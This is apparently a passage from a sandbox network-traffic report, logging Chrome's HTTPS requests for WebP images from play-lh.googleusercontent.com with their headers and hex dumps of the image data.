                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC860INData Raw: 52 49 46 46 84 0b 00 00 57 45 42 50 56 50 38 4c 78 0b 00 00 2f 33 c0 0c 00 09 33 6d db a8 ed 4e f3 67 3c 0e 11 fd 4f 08 46 0e cb 15 d5 d2 44 b9 24 fe 82 6d 24 49 4e fa 05 5a 6b 4c f2 8f 8e 08 70 49 81 6d 23 49 8a 2a ff 38 8f d9 bc 07 43 40 92 48 ff 3f d7 ff 04 f2 e1 17 7f 0a 80 4a d0 7b 34 76 6a 56 af ed f9 dc 82 8f 92 e7 32 dc ff 2f 00 5c c0 1d e0 cf e0 69 db b6 63 af 68 5b db af e7 55 4b 5a ba 6d db 76 ef 35 0c 95 6c 1b 25 db b6 6d 54 6d 1b dd b6 ed de 9b d3 92 f7 7d 9f ab 90 74 fc 84 f3 a6 24 db b6 dd 48 59 e7 3e 49 99 05 d4 a7 4b d0 63 7e cc bf 48 49 ef 78 a2 6d db b4 6d 6b db 72 ed 63 ee 75 b7 f7 be b6 6d db 76 e8 a6 1b b2 7d 6f f4 44 af 6f d8 b6 11 b4 6d db 36 1e 6c ad 39 e7 50 6f 31 01 b7 fe af 44 83 1e 1d e8 98 63 64 ec c7 3c 8c 98 58 cd e2 28 47
                                                                                                                                                                                                                                  Data Ascii: RIFFWEBPVP8Lx/33mNg<OFD$m$INZkLpIm#I*8C@H?J{4vjV2/\ich[UKZmv5l%mTm}t$HY>IKc~HIxmmkrcumv}oDom6l9Po1Dcd<X(G
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: 2e f5 ac 35 2c d8 a5 9e e3 a8 e9 54 e8 83 50 21 20 14 09 45 10 12 0a 2c 2f bf ef ff 08 9b 59 4d 86 1f 5e f3 f7 9c 9f 61 f7 5c 6d c7 22 79 6d a6 af be de c3 c8 96 80 82 bf 68 49 d9 5d ba d2 ba cf 73 14 13 2f f9 38 23 2b 2b 7d b0 50 24 48 28 d6 80 a2 25 41 98 fa ff 47 6d d3 b1 48 5e 96 e9 b1 d7 c7 39 7c f1 fd e8 29 c1 56 1e 72 bd 81 85 2d 05 1a e5 8f 09 5a 20 94 b4 cd dd b6 b2 e0 35 2b 34 0a 14 61 61 1e 83 91 4b df 7f 3f f1 ff ef c7 de 5b 1d 09 ae 25 6f b5 f9 fb 5c fe fb df db 70 c0 cc e1 a5 fb 61 73 60 95 f6 b7 c9 63 af 8f b0 bc 6e 76 93 b4 6c da 38 60 64 22 a0 88 35 99 32 84 16 3e bf df f1 75 20 c8 3b 66 09 28 42 31 33 0d 0e bf 79 fd ec 1b 5d 7a 12 77 a0 09 2a 19 53 f2 91 e4 c7 72 65 46 a6 2f 99 df a9 49 5e 17 f5 f1 81 4f bb 3e cc fc 0e 13 81 f8 a2 fe 3f
                                                                                                                                                                                                                                  Data Ascii: .5,TP! E,/YM^a\m"ymhI]s/8#++}P$H(%AGmH^9|)Vr-Z 5+4aaK?[%o\pas`cnvl8`d"52>u ;f(B13y]zw*SreF/I^O>?
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC706INData Raw: ce d1 ad 63 5b 07 5b 9b 53 1b 90 92 2c 58 cb 25 b6 8a c3 87 ef a3 33 13 6f 9d 85 2b 82 9c 3d ef 90 7f 9f af 2c 84 9a 0c 5f fc 7e 6c e6 80 31 90 f3 b2 63 6c 19 5b c3 a9 a3 29 ad a4 85 94 36 c9 46 3e e8 27 7f f5 fe df 92 66 92 ff 9c 91 53 e7 ad 41 0a 14 1b fe 74 9e 75 6a 2a d9 59 9e f2 3e f2 49 7d 51 73 5e ce 1b 5b 4e 49 5a 67 28 47 68 68 f5 66 7f fc a1 fd f2 4f 7d 4f 6f 29 39 e5 ab e6 8e 9c 38 07 6b 0a 14 0d 8a 0d 9f bc 5f bf ee 41 2b e4 3e fb 8e 47 4c 2c 29 d0 24 7b 66 76 ec 19 5b c6 29 39 e1 26 c7 5c e7 0a 6f e1 7d fc cd fb b1 4f 7e 1f b9 3d 96 95 cd b2 c3 6f 9d ef e6 2e fc 17 04 24 59 83 a2 29 9a 62 cd 8a 07 ec 3b 77 20 33 8f 7a 1f fe e9 cf 0f 3f 90 5f 5d cd 5f 4f 72 e1 c4 ff ec 6c 67 7d cf ac ef f5 3d d9 b1 97 bd 36 6b 7b ad 1c df b8 e2 85 9e b9 83 6b
                                                                                                                                                                                                                                  Data Ascii: c[[S,X%3o+=,_~l1cl[)6F>'fSAtuj*Y>I}Qs^[NIZg(GhhfO}Oo)98k_A+>GL,)${fv[)9&\o}O~=o.$Y)b;w 3z?_]_Orlg}=6k{k


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  114192.168.2.649964142.250.185.2464431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC510OUTGET /CgUPurtUp8SB709wsQcKLMv6JdIh1em0ka_58V69AorznLv42TV39etS2rt28wv9Rz8=w720-h405-rw HTTP/1.1
                                                                                                                                                                                                                                  Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUX
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC531INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                  Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: fife
                                                                                                                                                                                                                                  Content-Length: 46200
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:45 GMT
                                                                                                                                                                                                                                  Expires: Mon, 30 Sep 2024 04:53:45 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                  Age: 1
                                                                                                                                                                                                                                  ETag: "v1"
                                                                                                                                                                                                                                  Content-Type: image/webp
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC859INData Raw: 52 49 46 46 70 b4 00 00 57 45 42 50 56 50 38 20 64 b4 00 00 90 82 02 9d 01 2a d0 02 60 01 3e 55 24 8f 45 23 a2 21 25 29 34 0b e8 a0 0a 89 63 6d e7 ec 0c ce 50 7b 63 ac 94 89 65 f1 71 3e 76 fc 2d 2b f9 18 57 dd 77 81 f7 87 ee 25 c9 7e 3f fd 8f c8 1c d6 1b f7 98 8f 4b 7f bb fb 79 f9 87 e9 ef cc 5f f5 f3 f6 3f fb ef a1 cf c2 1f de 2f 56 5f ad 1f f2 ff c0 7b b3 7f d5 ff 87 fe 53 e0 1f f5 9f f7 ff ee 3d c0 ff 8c ff 3c fb ef ef 8d fd b1 f6 06 fe 67 fd 9f ef ff e3 7b ff 17 fb 7f 86 af da 8f da 1f 80 ff e6 df d9 bf ec 7e 7f ff e0 fa 00 f4 00 ea 17 83 9f 9f f5 ab fa 1f dc bf d0 fc e2 f8 8b fe 67 0f fe f5 fe a7 ed 97 a9 1f 78 1f a9 eb d3 fc ae fd 7f 63 fe db d0 3b f3 af ee 1f f0 37 e6 7a 1f 32 0f 07 7f d4 ff 35 f9 37 f2 8f 37 4f ac bf 87 ff 9f dc 17 f3 17 d8 af 02
                                                                                                                                                                                                                                  Data Ascii: RIFFpWEBPVP8 d*`>U$E#!%)4cmP{ceq>v-+Ww%~?Ky_?/V_{S=<g{~gxc;7z2577O
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: c8 d9 49 5f 99 8d cf 64 33 cd 6b 91 09 57 54 c1 83 15 d9 30 ba a2 bd dd ed a1 15 06 2b 5d 3a 25 c5 96 c8 41 56 5a e7 8c 95 66 c3 55 0a 5b 83 b7 b1 5c 7c 5c 60 df d0 fb 9f 2d 2e 0e 98 25 d5 db b1 3c 00 4f dc bd dd cf 84 55 7f b2 7b 7d 32 04 61 94 d2 c6 1e f7 09 b8 fc 58 67 d5 e2 e3 03 8f 55 75 c8 88 d0 f8 08 b5 a0 e7 12 27 a4 74 c7 e7 d7 a9 5e 78 67 a6 78 2e 42 5d a1 b7 e5 7e c6 11 83 de 92 01 de d9 ba f0 ad eb 0c 3a d5 0e c8 bb c8 b6 c5 e0 3c ad 5d 00 04 47 57 93 6b 26 15 d6 07 b3 af b1 6f 32 0d 82 b0 40 7f 55 ae ea aa 92 b4 dd 03 a7 83 e9 fe 7c 15 c5 02 5e 4a f0 7e f1 2e c9 67 d7 77 55 89 48 f7 1c cd 46 fe ca 73 dd fd 2f f6 f8 b8 61 06 fc 57 9d 98 6c c6 9d fe 07 9a 33 f4 3a ff dd 68 70 d8 9e 58 8f aa d7 ae f8 40 1d 67 7d 3c 5a d4 c9 43 8b 18 86 9d 16 8f
                                                                                                                                                                                                                                  Data Ascii: I_d3kWT0+]:%AVZfU[\|\`-.%<OU{}2aXgUu't^xgx.B]~:<]GWk&o2@U|^J~.gwUHFs/aWl3:hpX@g}<ZC
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: 68 d1 52 90 ff e4 8e 50 99 0a e4 7d 94 88 04 9e 80 09 bf 60 93 ca b1 ff f3 f4 3d 9b ea c0 e2 ed 89 ce e8 7a 8d be 3e d6 7a 33 4b 74 23 13 1b 3e 5c 38 bd 4f f1 8e c0 32 83 dd b7 a7 c7 6e 80 fb 16 ce bf 03 1b 31 67 99 23 74 c9 5f 10 7d e5 3d 6b 83 6e cf 89 03 f6 92 16 24 06 ed 7b 64 69 f6 82 8d 37 b4 53 d1 7c 61 e0 3f 64 18 ed 4f 98 4b 2a de 74 ba da c2 f4 94 48 41 2f 83 15 ea 7b f3 b0 30 53 7b 16 23 11 06 e3 b4 7d d8 a1 1c 5e 30 ab 87 90 52 f8 ba 76 f4 3e 1e 89 f5 66 a0 de 2d 30 fe 6b 39 9c 96 20 c9 d5 1d 8a 39 2a 4b a9 b1 ef e5 ef d6 f6 c7 f1 28 8f 35 ed 00 11 52 d1 7d 26 b1 5c 9e 93 52 a2 b1 6b b8 79 ef 7c 30 f0 32 18 c6 ba 7e 49 6a 48 68 70 3d 1b 37 7b 70 0f 3b 2f 28 e6 4e 37 64 58 ec c2 b5 d4 92 ad d5 29 00 26 2e 13 85 65 30 6c f0 1d 71 c9 aa be f8 5c
                                                                                                                                                                                                                                  Data Ascii: hRP}`=z>z3Kt#>\8O2n1g#t_}=kn${di7S|a?dOK*tHA/{0S{#}^0Rv>f-0k9 9*K(5R}&\Rky|02~IjHhp=7{p;/(N7dX)&.e0lq\
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: a5 75 f0 2d e7 7f 03 50 63 e3 3c 4c f4 e4 73 1c 91 58 d9 dc a3 f5 c6 99 bc d1 7b a1 8b 60 96 5d ad d1 84 88 18 57 f2 c3 4c e0 41 cf a2 e0 ff e2 ef 40 18 e2 fb b9 ac 4d 17 d7 3f fb 78 4e 7f b2 ac 82 47 a6 ff 4f 54 c4 91 27 ce 74 67 a3 35 cf 0c e9 7b 54 7d 7f 7c 25 95 4e 2c 42 11 b6 d7 69 95 cd 70 59 23 c1 53 dc 50 44 60 00 d8 39 b9 94 d0 9a fa ab 3b 1f 08 33 e1 e5 93 92 f4 24 80 ae cb a8 ee 8b 92 69 27 46 9a 2c 35 e2 f5 2e 3e ce b6 7c 47 e3 77 d6 78 ff 94 87 24 94 f5 ed 18 06 fe 41 e4 d4 af 8b 68 f2 8e 37 e6 ee b7 e1 06 ac 30 4c e2 39 48 91 48 b5 2c 84 07 62 84 ba 62 85 68 b2 6a 0f 2a ed 0e 1a 83 95 de 38 a3 ae e4 4f 67 df 68 aa d5 a1 64 59 fd 9b b0 e0 d0 b7 e9 8c e4 ee 2d 09 97 6e 60 f5 03 14 30 dd 06 03 e8 3d 36 c6 15 6d 37 0e 9d fb 0a 6e 95 7e ce cd 47
                                                                                                                                                                                                                                  Data Ascii: u-Pc<LsX{`]WLA@M?xNGOT'tg5{T}|%N,BipY#SPD`9;3$i'F,5.>|Gwx$Ah70L9HH,bbhj*8OghdY-n`0=6m7n~G
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: ab b1 ab b2 9e 63 d4 9b e7 d4 a4 b6 12 3f 5b ec 79 2c 9b c0 44 e6 a9 34 8f bc e6 8b 58 0e 33 ad ff 13 7a 2b a7 76 50 d7 f7 15 61 16 d8 f8 00 f7 a2 49 b9 11 4e d7 c6 8e 51 eb 93 f0 d2 23 af bf d3 c4 73 c0 f8 7b 56 d2 6a 3d 43 c1 dc d4 8f bc 5c af 85 f2 c5 3e 42 6a 9a fa 32 dc 24 31 69 b0 15 b9 5f 52 54 53 ac db d4 c4 bb 8a cb ec 0f 41 0d 51 96 40 53 b2 d8 be 1d d6 06 de c8 ee ab e6 9a db 54 7c b7 4d 52 65 cc 65 80 00 00 fe fd d9 3b 33 37 d6 29 b2 4f b4 d6 0c 70 71 60 75 a5 c0 02 84 df af ce c6 f1 ec 49 29 42 cc e9 7b 80 1e bc 7d f7 73 7c dd c3 55 1c b8 6a 9f bb 67 53 b4 9a fa 45 d1 9e ee 6c 59 69 d4 f3 ec f0 9f 91 b8 07 4b a6 e1 a0 46 89 b4 01 00 f6 a6 71 02 18 3e 7e 19 99 d9 6e c5 20 bf f7 e1 f3 f1 0b bb 51 29 2e e6 a7 86 d3 c5 cf 45 fa 2d 44 e8 10 d3 4e
                                                                                                                                                                                                                                  Data Ascii: c?[y,D4X3z+vPaINQ#s{Vj=C\>Bj2$1i_RTSAQ@ST|MRee;37)Opq`uI)B{}s|UjgSElYiKFq>~n Q).E-DN
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: 62 0f 95 a2 24 cf 6c 63 58 8f 47 32 19 44 71 10 e5 1d 7a d1 32 bc c5 75 86 65 65 1f a0 ef bd 63 bd 68 79 63 02 ae f5 f8 68 f1 98 c3 04 5d 2a 1d c9 5a 6a 5b a8 db f3 39 a7 d8 66 d9 b0 01 c8 ff e9 95 38 45 f5 9d 94 d5 c8 9f 6f 28 af 31 e1 a3 85 e2 83 7e 18 b8 43 b5 91 47 b5 33 ff 48 4e 60 98 ed 19 1d 13 fd 2b fd ae 8d 0e a5 1b 89 fb c9 c4 e0 78 7a 20 d3 ad 82 5b e7 2b 88 ac 37 13 e4 df 86 59 07 a5 f6 c1 46 42 c9 ff 8d 48 e0 4c b9 4c d7 36 29 9c fd 26 6f 8a c9 e6 f5 b1 69 8a 94 87 13 05 c7 1b 70 be 14 85 5b ed 34 08 6a 87 ee b2 41 7e d5 9f a9 40 5f d6 d8 7e 8d eb a9 39 17 29 f6 32 be fa 1b 68 31 c4 f0 16 87 dd e1 8d 05 4b ee 69 ac 5f 69 f6 62 72 4c ca b1 34 b3 8e 44 f5 7a 9a bf 48 d6 1c c5 dd ec 69 b4 cc ae 69 63 d9 6a c8 7e 9c 77 ae 86 f3 44 12 b1 2a 18 c7
                                                                                                                                                                                                                                  Data Ascii: b$lcXG2Dqz2ueechych]*Zj[9f8Eo(1~CG3HN`+xz [+7YFBHLL6)&oip[4jA~@_~9)2h1Ki_ibrL4DzHiicj~wD*
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: f5 59 d1 ba fe 05 d9 ce 19 b7 a6 65 d3 c3 62 6c e2 d7 8f 5b fb ce 72 b6 08 3a 95 ff f1 2d 50 d6 fe 68 fc 37 88 e0 c7 cf 50 41 a6 31 a7 c3 c5 fa 63 bd 7c 92 9e 3f 09 ee f8 8a 34 2a b9 e6 14 12 6c ff 75 a0 7f 73 29 d7 e3 04 f2 2b b1 25 71 ae b4 35 34 9c b3 de ed c3 2f 63 da e0 b5 ad 1b 68 fc af 52 c5 59 76 51 cc 2d 1d bd c9 33 de fb 78 1a 4d d1 97 aa 07 dc cb ff 94 a0 fd 02 33 b9 d0 be 88 c5 f7 a2 7b 03 fe 24 b9 f7 1f b5 d4 d5 d2 26 63 6f 4f 66 07 5c 59 cb 4d 31 a7 ec a2 c1 81 55 a5 63 c6 92 1e 17 1f 37 b2 e4 05 60 9e 41 b0 de 2e 65 ee 19 e1 d3 48 2d f6 95 0e 86 3e 1c e5 e0 c8 fe 67 06 54 3a b2 2a 62 83 a4 ee 6a e3 30 4e 64 7a 97 e6 a5 ed b6 42 c5 df 70 75 27 b0 49 76 c5 9f 35 48 32 0f a6 cb 32 d6 b8 8c a1 ef 54 6d 35 36 0e 39 49 97 39 3d c4 87 9b 51 f0 92
                                                                                                                                                                                                                                  Data Ascii: Yebl[r:-Ph7PA1c|?4*lus)+%q54/chRYvQ-3xM3{$&coOf\YM1Uc7`A.eH->gT:*bj0NdzBpu'Iv5H22Tm569I9=Q
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: 3a d0 23 87 af 11 c4 1e 58 fc bb 21 34 e7 20 66 99 d2 b8 c3 7c 00 b9 50 4e 8a 1c 99 bd 5b b6 2d ce ef 71 69 bd da e0 f0 73 b3 19 22 1d 6f 17 b3 cf 5c 26 5f f4 a8 28 9e f7 27 ce c7 96 34 f9 97 fc 0d 9d 1e 72 cc 4c 0b 28 17 f9 d0 48 42 eb ad 18 9b 9d f0 29 a7 59 67 ae 6b f6 63 57 9a ca bc ab 29 e0 43 cc 3e 48 78 5f 2b 5a b3 d1 86 35 7d 48 dd 30 a8 23 61 15 f6 93 eb df 63 87 97 a7 c3 fb 6b d9 ee a3 81 94 fc 77 ba 38 ac 85 bf 91 a9 45 51 b4 a8 12 c5 4a b5 05 59 b6 10 5d b5 f3 52 e1 13 93 f4 2f 8c 8a 7f f3 7d 39 43 a1 24 d1 05 8d 3d 58 5f 13 cc 27 04 b5 02 94 d8 3c 99 49 10 d7 6d 7b 17 dc 14 7f 9f fb 61 51 93 c2 c0 03 88 a3 ce 1f 3c 33 fa 57 3a 40 25 ca 65 65 44 91 a4 f5 6e 2c 9a e7 81 92 7d 53 fe f9 71 ea c7 63 44 fb 08 16 3b 58 24 a1 da 44 b4 a1 fa a4 8c ec
                                                                                                                                                                                                                                  Data Ascii: :#X!4 f|PN[-qis"o\&_('4rL(HB)YgkcW)C>Hx_+Z5}H0#ackw8EQJY]R/}9C$=X_'<Im{aQ<3W:@%eeDn,}SqcD;X$D
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: 22 a5 ac 2f 2e 08 e0 a5 b9 31 8b f5 6c a1 b5 8a a8 da 33 2e 5a ab 8f 4f 9b 47 27 e8 dc 3e c1 64 65 93 bd fe 60 41 c0 e5 8c 19 ee c8 2c 66 44 39 5e 95 03 4d 77 6c 98 df 4f ee bf ed 9a 46 d2 e3 99 90 92 73 c7 e8 0b 76 96 5f 54 fc 10 46 dd 4b a6 7d 32 f5 18 aa f7 92 e8 6b ba a7 63 eb 8d 37 69 68 db 3c 1c 45 76 c3 84 13 7e 9e 99 ef b9 6a 35 ae 57 55 c4 75 be a0 a8 5d 48 c4 e2 0b 65 d2 f5 d5 30 e8 4a b4 b6 cb 19 b5 a9 46 68 72 af 5f f0 71 33 ac 2a a0 f3 7c d9 0b 5a 32 2c 9c 9c 3d 1e 2e 77 88 8c 41 13 c2 82 2c 44 bd c1 3a 2b ea 92 80 95 01 c4 2f b4 0b ac da 4f 86 60 ef 07 d2 ac ec 87 c3 f6 77 c3 0d 0e 51 4d 00 26 3a b9 e0 89 5a ad 2c bb 70 70 9e 78 ea f3 6a 6b 4b 8e 8c ad 7d aa 0f 40 5e 7d 94 f4 2b 8d 6d ab 7e 8c fb 54 b2 75 c6 65 eb 79 51 e8 d9 6d 32 67 8c f8
                                                                                                                                                                                                                                  Data Ascii: "/.1l3.ZOG'>de`A,fD9^MwlOFsv_TFK}2kc7ih<Ev~j5WUu]He0JFhr_q3*|Z2,=.wA,D:+/O`wQM&:Z,ppxjkK}@^}+m~TueyQm2g
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: 40 b9 fa 11 af 67 f5 12 93 de 1b 85 60 a2 96 90 dc 05 89 b2 d8 47 53 eb b9 28 ac f2 fb ff d2 6a b4 e1 ae 3c a2 6d 49 94 82 16 fc f3 41 2a cc 61 91 aa 46 bf 51 9d f4 b9 15 88 80 11 fb 9e c4 f5 c4 b6 b4 46 4b d7 2a f5 5f 14 b6 4a 7e 3c a6 9f 5c 60 c6 0a e0 a0 a9 19 fe 29 4d c3 57 27 bd 14 a7 f5 24 df 41 7a c7 b1 80 c4 96 08 5e ad 82 24 a9 c3 49 17 6f b7 23 9c 8d 60 50 f1 c4 9a ef 6f 69 0b cc 56 d5 20 89 f4 bc 20 b8 40 22 72 d3 1e e6 07 8a 74 8a e5 1a 67 72 5e 6d 2b 15 34 5b 46 01 ec 42 6f 17 01 00 6f 40 98 57 d8 05 74 fd b3 02 32 1d 4d e0 50 fd 73 de a9 eb 45 00 51 a0 cd f4 e5 81 ac 42 7e e8 0a 4a df 16 4c c3 df f7 21 f7 1a a0 f1 da b5 87 2b 22 f5 fb 22 13 af b7 ca 48 3e 9b 7b 80 88 d5 86 ce 31 af 88 85 4d b4 6e 2d b2 30 2e 75 71 df 5c 44 83 bd 80 97 58 cf
                                                                                                                                                                                                                                  Data Ascii: @g`GS(j<mIA*aFQFK*_J~<\`)MW'$Az^$Io#`PoiV @"rtgr^m+4[FBoo@Wt2MPsEQB~JL!+""H>{1Mn-0.uq\DX


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  115192.168.2.649962142.250.185.2464431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC509OUTGET /xNx9CfCzg_VugRMv3rIxVd-GjLRx6_dIXGfTlrKqJwkZCPg_w-ZZNosQT46MYIoo_Q=w526-h296-rw HTTP/1.1
                                                                                                                                                                                                                                  Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUX
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                  Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: fife
                                                                                                                                                                                                                                  Content-Length: 12738
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 03:16:23 GMT
                                                                                                                                                                                                                                  Expires: Mon, 30 Sep 2024 03:16:23 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                  Age: 5843
                                                                                                                                                                                                                                  ETag: "v1"
                                                                                                                                                                                                                                  Content-Type: image/webp
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC856INData Raw: 52 49 46 46 ba 31 00 00 57 45 42 50 56 50 38 20 ae 31 00 00 b0 9b 00 9d 01 2a a6 00 28 01 3e 65 28 90 45 24 22 a1 97 5b c6 88 40 06 44 b5 00 68 65 19 7f 73 fc 8c ed d8 fa 1d f7 fb 6f ec ff e6 77 cc 85 89 fc 0f f7 9f d3 bc ab 55 57 96 df 3a 7f bf ff 1d f9 17 f3 2b fd 27 fb cf ef 1e eb 7f 41 ff cc f7 03 fd 4a ff 8f fd 97 fb f7 64 3f dc ef 50 7f d2 7f cf 7e db fb bb ff af fd 96 f7 85 fd f3 d4 0f fa 9f f9 cf 5b ff f8 1e c8 ff e0 bf da 7f ff f7 03 fe 81 fe ab d3 57 f6 e7 e0 fb fb 07 fb bf db df 81 6f d9 cf ff 5e c0 1f f8 bd 40 3f ee 71 40 7f 65 f4 5d e0 cf e2 bf 2b fc f3 f2 6d ea ff 70 7d 88 72 4f da 47 fa 5e 88 ff 33 fb d3 fb af f0 5f ba 1f 14 ff a0 ff 73 e1 7f ca 9f ee fd 42 3f 22 fe 7b fe 5b f3 3f ca c7 ba b2 dc 7a 05 fb 31 f5 3f f6 df de 7f 77 ff d9 7c 2e
                                                                                                                                                                                                                                  Data Ascii: RIFF1WEBPVP8 1*(>e(E$"[@DhesowUW:+'AJd?P~[Wo^@?q@e]+mp}rOG^3_sB?"{[?z1?w|.
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: 41 f7 43 3b 0d 9f 22 b1 63 49 bc 22 a7 bb 7e b9 a7 bb 0c 0f 8a 93 d8 8c 74 6c 5d f6 10 72 3c 5e 09 db ec c4 4e 4f 33 ba 2d 03 c5 2e 5e 79 d8 f3 9c 6f 21 a9 01 b2 51 80 14 d5 cb 74 c7 2c b2 45 10 fb 8d 8b ee b4 7e 54 56 d1 17 97 ec dd cd 79 0e 3a ce 37 55 0d c4 a5 82 69 bb 6b 3a cb 85 a2 71 86 f1 96 41 7d 94 df 9a 1c 8f 3b a7 d6 0a 0e 89 a4 5c dc 61 40 65 69 c7 0d 49 9e ff 3c 47 5f 40 18 6c cb a8 56 a3 69 66 96 08 ca 2b f4 6b ac d8 4c 9d d3 78 6b 97 8a 4e 64 c9 46 ed 2c ee 00 67 2d 0e a4 dd ed dd 50 7d 96 aa 51 b4 53 33 0f 3e a1 14 2e 4a 4a cf 6e 32 99 8a 47 80 81 cb 96 0b 20 9b a2 67 5c 18 42 78 ef b5 5f 42 7f 5f c6 02 1e 46 a0 c3 d7 fb 06 61 65 ab 8e b9 0d 70 ef a7 9f 3f 45 03 32 d7 f9 a4 8c ce 19 1e 2a 88 f2 b3 21 83 7c 3a 2b 90 dd 54 a1 2f ee 7d fe 76
                                                                                                                                                                                                                                  Data Ascii: AC;"cI"~tl]r<^NO3-.^yo!Qt,E~TVy:7Uik:qA};\a@eiI<G_@lVif+kLxkNdF,g-P}QS3>.JJn2G g\Bx_B_Faep?E2*!|:+T/}v
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: c0 5b c9 56 d0 51 48 a2 65 9b f2 90 7c de 4d ce 82 26 06 df f7 d2 f3 42 97 9f 8d 6f 20 a1 85 27 fe 1d d7 b9 6b 05 60 ce b4 71 f1 b1 b6 a3 65 18 9c 62 29 c1 38 89 52 17 81 44 dd 90 4f 96 3b 8e a9 cb 70 5a bc 3f d2 a2 ef 83 82 f7 28 b4 db 2a ae ab 85 b0 2a 87 bd 6f 7b f4 27 0d 2d 9b 7a 9a 06 9c 5d 1b 93 83 89 84 ff 07 56 3c f1 0c a2 84 9e 91 f3 7e 5d 84 e2 11 65 89 da 21 15 ef c9 d8 2d a6 0c 08 f6 9e 93 aa 35 b9 59 5a 92 0d 54 4a ba 11 55 dc e4 ed 64 9d 44 b8 7f 07 72 91 91 8f 87 06 4c 39 8b 38 8e 2e 0d 8a 01 fa 58 98 be cf 1b 5a 7e 9f f2 ac 9a 0f d3 a2 bc 23 84 87 96 65 ae 69 6f dd 29 a1 8c 80 33 e4 a4 96 5e b8 ab c7 ee d8 ee 45 d6 3d ea 9c a7 68 66 d9 c2 ed 2a b5 d8 e4 dd e4 9a 44 bf da c0 87 bb 5b 0a d6 21 77 63 b5 00 c8 26 68 da 90 db 25 77 31 2a 5e 8a
                                                                                                                                                                                                                                  Data Ascii: [VQHe|M&Bo 'k`qeb)8RDO;pZ?(**o{'-z]V<~]e!-5YZTJUdDrL98.XZ~#eio)3^E=hf*D[!wc&h%w1*^
